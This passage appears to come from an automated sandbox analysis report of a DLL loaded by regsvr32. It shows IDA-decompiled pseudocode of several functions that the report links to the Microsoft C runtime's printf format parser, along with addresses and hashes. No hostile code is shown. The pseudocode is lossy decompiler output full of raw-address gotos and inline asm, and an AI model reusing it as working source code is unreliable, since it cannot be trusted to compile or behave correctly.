                                                  				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                  				goto 0xf9d3bfbe;
                                                  				_a704 = 0;
                                                  				goto E000007FE7FEF9D3BB66;
                                                  				goto 0xf9d3bfd9;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xb");
                                                  				_a976 = _a696;
                                                  				_a976 = _a976 - 0x41;
                                                  				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                  				goto __rax;
                                                  			}



                                                  0x7fef9d3be3a
                                                  0x7fef9d3be49
                                                  0x7fef9d3be53
                                                  0x7fef9d3be61
                                                  0x7fef9d3be6b
                                                  0x7fef9d3be71
                                                  0x7fef9d3be84
                                                  0x7fef9d3be91
                                                  0x7fef9d3be9d
                                                  0x7fef9d3bea5
                                                  0x7fef9d3beae
                                                  0x7fef9d3beb2
                                                  0x7fef9d3bebb
                                                  0x7fef9d3bed1
                                                  0x7fef9d3bee2
                                                  0x7fef9d3bef0
                                                  0x7fef9d3befc
                                                  0x7fef9d3bf04
                                                  0x7fef9d3bf17
                                                  0x7fef9d3bf28
                                                  0x7fef9d3bf36
                                                  0x7fef9d3bf42
                                                  0x7fef9d3bf4a
                                                  0x7fef9d3bf5a
                                                  0x7fef9d3bf6a
                                                  0x7fef9d3bf7a
                                                  0x7fef9d3bf8a
                                                  0x7fef9d3bf9a
                                                  0x7fef9d3bfaa
                                                  0x7fef9d3bfac
                                                  0x7fef9d3bfae
                                                  0x7fef9d3bfb9
                                                  0x7fef9d3bfbe
                                                  0x7fef9d3bfc7
                                                  0x7fef9d3bfcb
                                                  0x7fef9d3bfd1
                                                  0x7fef9d3bfe6
                                                  0x7fef9d3bff7
                                                  0x7fef9d3c006
                                                  0x7fef9d3c02d

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                  • API String ID: 530996419-3826063230
                                                  • Opcode ID: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                  • Instruction ID: d6c85ddd6a9fac6d59453cfc6279b165f514207326055716b4e5bf0dd1bf0ecb
                                                  • Opcode Fuzzy Hash: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                  • Instruction Fuzzy Hash: 0A916F72A0D6C68AE3F08B54E88477EB7E4E385342F601026D7CD87AA9CB7ED5418F11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E000007FE7FEF9D3DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {
                                                  
                                                  				_a1408 = _a1208 & 0x0000ffff;
                                                  				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                  				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                  				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                  				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                  				goto 0xf9d3df88;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                  				_a1544 =  &(_a1544[1]);
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3de61;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xf");
                                                  				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                  				goto 0xf9d3df6d;
                                                  				_a1216 = 0;
                                                  				goto E000007FE7FEF9D3DC41;
                                                  				goto 0xf9d3df88;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xb");
                                                  				_a1412 = _a1208 & 0x0000ffff;
                                                  				_a1412 = _a1412 - 0x41;
                                                  				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                  				goto __rax;
                                                  			}



                                                  0x7fef9d3dde8
                                                  0x7fef9d3ddf7
                                                  0x7fef9d3de01
                                                  0x7fef9d3de0f
                                                  0x7fef9d3de19
                                                  0x7fef9d3de1f
                                                  0x7fef9d3de32
                                                  0x7fef9d3de40
                                                  0x7fef9d3de4c
                                                  0x7fef9d3de54
                                                  0x7fef9d3de5d
                                                  0x7fef9d3de61
                                                  0x7fef9d3de6a
                                                  0x7fef9d3de80
                                                  0x7fef9d3de91
                                                  0x7fef9d3de9f
                                                  0x7fef9d3deab
                                                  0x7fef9d3deb3
                                                  0x7fef9d3dec6
                                                  0x7fef9d3ded7
                                                  0x7fef9d3dee5
                                                  0x7fef9d3def1
                                                  0x7fef9d3def9
                                                  0x7fef9d3df09
                                                  0x7fef9d3df19
                                                  0x7fef9d3df29
                                                  0x7fef9d3df39
                                                  0x7fef9d3df49
                                                  0x7fef9d3df59
                                                  0x7fef9d3df5b
                                                  0x7fef9d3df5d
                                                  0x7fef9d3df68
                                                  0x7fef9d3df6d
                                                  0x7fef9d3df76
                                                  0x7fef9d3df7a
                                                  0x7fef9d3df80
                                                  0x7fef9d3df95
                                                  0x7fef9d3dfa6
                                                  0x7fef9d3dfb5
                                                  0x7fef9d3dfdc

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                  • API String ID: 530996419-4206863317
                                                  • Opcode ID: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                  • Instruction ID: 52af39986bd237b596cdecada1f5af7c0900048515ebe490badd59f4da94dd67
                                                  • Opcode Fuzzy Hash: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                  • Instruction Fuzzy Hash: 35910A62A0C6C18AE7F08B55E88077EB3E1F385756F600026E6CD87AA4DB7ED855DF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E000007FE7FEF9D3BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                  				void* _t171;
                                                  				char* _t191;
                                                  				char* _t192;
                                                  
                                                  				_a968 = _a696 & 0x000000ff;
                                                  				if (_a968 == 0x20) goto 0xf9d3bd57;
                                                  				if (_a968 == 0x23) goto 0xf9d3bd64;
                                                  				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                                  				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                                  				if (_a968 == 0x30) goto 0xf9d3bd72;
                                                  				goto 0xf9d3bd7d;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				goto 0xf9d3bd7d;
                                                  				_a80 = _a80 | 0x00000001;
                                                  				goto 0xf9d3bd7d;
                                                  				_a80 = _a80 | 0x00000002;
                                                  				goto 0xf9d3bd7d;
                                                  				asm("bts eax, 0x7");
                                                  				goto 0xf9d3bd7d;
                                                  				_a80 = _a80 | 0x00000008;
                                                  				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                  				_t191 =  &_a1112;
                                                  				_a88 = E000007FE7FEF9D31E40(_t191);
                                                  				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				_a88 =  ~_a88;
                                                  				goto 0xf9d3bdd5;
                                                  				_a88 = _t171 + _t191 - 0x30;
                                                  				_a116 = 0;
                                                  				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                  				_t192 =  &_a1112;
                                                  				_a116 = E000007FE7FEF9D31E40(_t192);
                                                  				if (_a116 >= 0) goto 0xf9d3be14;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3be2d;
                                                  				_a116 = _t171 + _t192 - 0x30;
                                                  				_a972 = _a696 & 0x000000ff;
                                                  				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                  				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                  				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                  				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                  				goto 0xf9d3bfd9;
                                                  				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                  				_a1096 = _a1096 + 1;
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3beb2;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xf");
                                                  				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                  				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                  				goto 0xf9d3bfbe;
                                                  				_a704 = 0;
                                                  				goto E000007FE7FEF9D3BB66;
                                                  				goto 0xf9d3bfd9;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xb");
                                                  				_a976 = _a696;
                                                  				_a976 = _a976 - 0x41;
                                                  				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                  				goto __rax;
                                                  			}






                                                  0x7fef9d3bd02
                                                  0x7fef9d3bd11
                                                  0x7fef9d3bd1b
                                                  0x7fef9d3bd25
                                                  0x7fef9d3bd2f
                                                  0x7fef9d3bd39
                                                  0x7fef9d3bd3b
                                                  0x7fef9d3bd44
                                                  0x7fef9d3bd48
                                                  0x7fef9d3bd51
                                                  0x7fef9d3bd55
                                                  0x7fef9d3bd5e
                                                  0x7fef9d3bd62
                                                  0x7fef9d3bd68
                                                  0x7fef9d3bd70
                                                  0x7fef9d3bd79
                                                  0x7fef9d3bd8d
                                                  0x7fef9d3bd8f
                                                  0x7fef9d3bd9c
                                                  0x7fef9d3bda5
                                                  0x7fef9d3bdae
                                                  0x7fef9d3bdb8
                                                  0x7fef9d3bdbc
                                                  0x7fef9d3bdd1
                                                  0x7fef9d3bdda
                                                  0x7fef9d3bdf2
                                                  0x7fef9d3bdf4
                                                  0x7fef9d3be01
                                                  0x7fef9d3be0a
                                                  0x7fef9d3be0c
                                                  0x7fef9d3be14
                                                  0x7fef9d3be29
                                                  0x7fef9d3be3a
                                                  0x7fef9d3be49
                                                  0x7fef9d3be53
                                                  0x7fef9d3be61
                                                  0x7fef9d3be6b
                                                  0x7fef9d3be71
                                                  0x7fef9d3be84
                                                  0x7fef9d3be91
                                                  0x7fef9d3be9d
                                                  0x7fef9d3bea5
                                                  0x7fef9d3beae
                                                  0x7fef9d3beb2
                                                  0x7fef9d3bebb
                                                  0x7fef9d3bed1
                                                  0x7fef9d3bee2
                                                  0x7fef9d3bef0
                                                  0x7fef9d3befc
                                                  0x7fef9d3bf04
                                                  0x7fef9d3bf17
                                                  0x7fef9d3bf28
                                                  0x7fef9d3bf36
                                                  0x7fef9d3bf42
                                                  0x7fef9d3bf4a
                                                  0x7fef9d3bf5a
                                                  0x7fef9d3bf6a
                                                  0x7fef9d3bf7a
                                                  0x7fef9d3bf8a
                                                  0x7fef9d3bf9a
                                                  0x7fef9d3bfaa
                                                  0x7fef9d3bfac
                                                  0x7fef9d3bfae
                                                  0x7fef9d3bfb9
                                                  0x7fef9d3bfbe
                                                  0x7fef9d3bfc7
                                                  0x7fef9d3bfcb
                                                  0x7fef9d3bfd1
                                                  0x7fef9d3bfe6
                                                  0x7fef9d3bff7
                                                  0x7fef9d3c006
                                                  0x7fef9d3c02d

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 530996419-4087627031
                                                  • Opcode ID: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                  • Instruction ID: f671f2f81670ff54d1d55a26610e2e3881df7bf560f190d6bc7d2e9ce8938301
                                                  • Opcode Fuzzy Hash: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                  • Instruction Fuzzy Hash: 8B517E72A0D6C28AF3F18B64E855BBEB7E4F384345F600126D2C9869A9DB7DE540CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E000007FE7FEF9D3DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                  				void* _t171;
                                                  				char* _t191;
                                                  				char* _t192;
                                                  
                                                  				_a1404 = _a1208 & 0x0000ffff;
                                                  				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                  				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                  				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                  				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                  				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000001;
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000002;
                                                  				goto 0xf9d3dd2b;
                                                  				asm("bts eax, 0x7");
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000008;
                                                  				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                  				_t191 =  &_a1560;
                                                  				_a88 = E000007FE7FEF9D31E40(_t191);
                                                  				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				_a88 =  ~_a88;
                                                  				goto 0xf9d3dd83;
                                                  				_a88 = _t171 + _t191 - 0x30;
                                                  				_a116 = 0;
                                                  				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                  				_t192 =  &_a1560;
                                                  				_a116 = E000007FE7FEF9D31E40(_t192);
                                                  				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3dddb;
                                                  				_a116 = _t171 + _t192 - 0x30;
                                                  				_a1408 = _a1208 & 0x0000ffff;
                                                  				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                  				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                  				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                  				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                  				goto 0xf9d3df88;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                  				_a1544 =  &(_a1544[1]);
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3de61;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xf");
                                                  				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                  				goto 0xf9d3df6d;
                                                  				_a1216 = 0;
                                                  				goto E000007FE7FEF9D3DC41;
                                                  				goto 0xf9d3df88;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xb");
                                                  				_a1412 = _a1208 & 0x0000ffff;
                                                  				_a1412 = _a1412 - 0x41;
                                                  				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                  				goto __rax;
                                                  			}






                                                  0x7fef9d3dcb0
                                                  0x7fef9d3dcbf
                                                  0x7fef9d3dcc9
                                                  0x7fef9d3dcd3
                                                  0x7fef9d3dcdd
                                                  0x7fef9d3dce7
                                                  0x7fef9d3dce9
                                                  0x7fef9d3dcf2
                                                  0x7fef9d3dcf6
                                                  0x7fef9d3dcff
                                                  0x7fef9d3dd03
                                                  0x7fef9d3dd0c
                                                  0x7fef9d3dd10
                                                  0x7fef9d3dd16
                                                  0x7fef9d3dd1e
                                                  0x7fef9d3dd27
                                                  0x7fef9d3dd3b
                                                  0x7fef9d3dd3d
                                                  0x7fef9d3dd4a
                                                  0x7fef9d3dd53
                                                  0x7fef9d3dd5c
                                                  0x7fef9d3dd66
                                                  0x7fef9d3dd6a
                                                  0x7fef9d3dd7f
                                                  0x7fef9d3dd88
                                                  0x7fef9d3dda0
                                                  0x7fef9d3dda2
                                                  0x7fef9d3ddaf
                                                  0x7fef9d3ddb8
                                                  0x7fef9d3ddba
                                                  0x7fef9d3ddc2
                                                  0x7fef9d3ddd7
                                                  0x7fef9d3dde8
                                                  0x7fef9d3ddf7
                                                  0x7fef9d3de01
                                                  0x7fef9d3de0f
                                                  0x7fef9d3de19
                                                  0x7fef9d3de1f
                                                  0x7fef9d3de32
                                                  0x7fef9d3de40
                                                  0x7fef9d3de4c
                                                  0x7fef9d3de54
                                                  0x7fef9d3de5d
                                                  0x7fef9d3de61
                                                  0x7fef9d3de6a
                                                  0x7fef9d3de80
                                                  0x7fef9d3de91
                                                  0x7fef9d3de9f
                                                  0x7fef9d3deab
                                                  0x7fef9d3deb3
                                                  0x7fef9d3dec6
                                                  0x7fef9d3ded7
                                                  0x7fef9d3dee5
                                                  0x7fef9d3def1
                                                  0x7fef9d3def9
                                                  0x7fef9d3df09
                                                  0x7fef9d3df19
                                                  0x7fef9d3df29
                                                  0x7fef9d3df39
                                                  0x7fef9d3df49
                                                  0x7fef9d3df59
                                                  0x7fef9d3df5b
                                                  0x7fef9d3df5d
                                                  0x7fef9d3df68
                                                  0x7fef9d3df6d
                                                  0x7fef9d3df76
                                                  0x7fef9d3df7a
                                                  0x7fef9d3df80
                                                  0x7fef9d3df95
                                                  0x7fef9d3dfa6
                                                  0x7fef9d3dfb5
                                                  0x7fef9d3dfdc

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 530996419-1247675978
                                                  • Opcode ID: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                  • Instruction ID: decea58dbdbd6501be5c610137b77bb3c0dc28cbce38a3a9de9bceb14a18b164
                                                  • Opcode Fuzzy Hash: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                  • Instruction Fuzzy Hash: 1F510CB2A0C6C68AE7B09B64F8407BEB7E0F385346F600125D6C9869A8D77DE444DF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 26%
                                                  			E000007FE7FEF9D3BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                  				void* _t139;
                                                  				char* _t159;
                                                  				char* _t160;
                                                  
                                                  				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                  				_t159 =  &_a1112;
                                                  				_a88 = E000007FE7FEF9D31E40(_t159);
                                                  				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				_a88 =  ~_a88;
                                                  				goto 0xf9d3bdd5;
                                                  				_a88 = _t139 + _t159 - 0x30;
                                                  				_a116 = 0;
                                                  				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                  				_t160 =  &_a1112;
                                                  				_a116 = E000007FE7FEF9D31E40(_t160);
                                                  				if (_a116 >= 0) goto 0xf9d3be14;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3be2d;
                                                  				_a116 = _t139 + _t160 - 0x30;
                                                  				_a972 = _a696 & 0x000000ff;
                                                  				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                  				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                  				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                  				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                  				goto 0xf9d3bfd9;
                                                  				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                  				_a1096 = _a1096 + 1;
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3beb2;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xf");
                                                  				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                  				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                  				goto 0xf9d3bfbe;
                                                  				_a704 = 0;
                                                  				goto E000007FE7FEF9D3BB66;
                                                  				goto 0xf9d3bfd9;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xb");
                                                  				_a976 = _a696;
                                                  				_a976 = _a976 - 0x41;
                                                  				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                  				goto __rax;
                                                  			}






                                                  0x7fef9d3bd8d
                                                  0x7fef9d3bd8f
                                                  0x7fef9d3bd9c
                                                  0x7fef9d3bda5
                                                  0x7fef9d3bdae
                                                  0x7fef9d3bdb8
                                                  0x7fef9d3bdbc
                                                  0x7fef9d3bdd1
                                                  0x7fef9d3bdda
                                                  0x7fef9d3bdf2
                                                  0x7fef9d3bdf4
                                                  0x7fef9d3be01
                                                  0x7fef9d3be0a
                                                  0x7fef9d3be0c
                                                  0x7fef9d3be14
                                                  0x7fef9d3be29
                                                  0x7fef9d3be3a
                                                  0x7fef9d3be49
                                                  0x7fef9d3be53
                                                  0x7fef9d3be61
                                                  0x7fef9d3be6b
                                                  0x7fef9d3be71
                                                  0x7fef9d3be84
                                                  0x7fef9d3be91
                                                  0x7fef9d3be9d
                                                  0x7fef9d3bea5
                                                  0x7fef9d3beae
                                                  0x7fef9d3beb2
                                                  0x7fef9d3bebb
                                                  0x7fef9d3bed1
                                                  0x7fef9d3bee2
                                                  0x7fef9d3bef0
                                                  0x7fef9d3befc
                                                  0x7fef9d3bf04
                                                  0x7fef9d3bf17
                                                  0x7fef9d3bf28
                                                  0x7fef9d3bf36
                                                  0x7fef9d3bf42
                                                  0x7fef9d3bf4a
                                                  0x7fef9d3bf5a
                                                  0x7fef9d3bf6a
                                                  0x7fef9d3bf7a
                                                  0x7fef9d3bf8a
                                                  0x7fef9d3bf9a
                                                  0x7fef9d3bfaa
                                                  0x7fef9d3bfac
                                                  0x7fef9d3bfae
                                                  0x7fef9d3bfb9
                                                  0x7fef9d3bfbe
                                                  0x7fef9d3bfc7
                                                  0x7fef9d3bfcb
                                                  0x7fef9d3bfd1
                                                  0x7fef9d3bfe6
                                                  0x7fef9d3bff7
                                                  0x7fef9d3c006
                                                  0x7fef9d3c02d

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
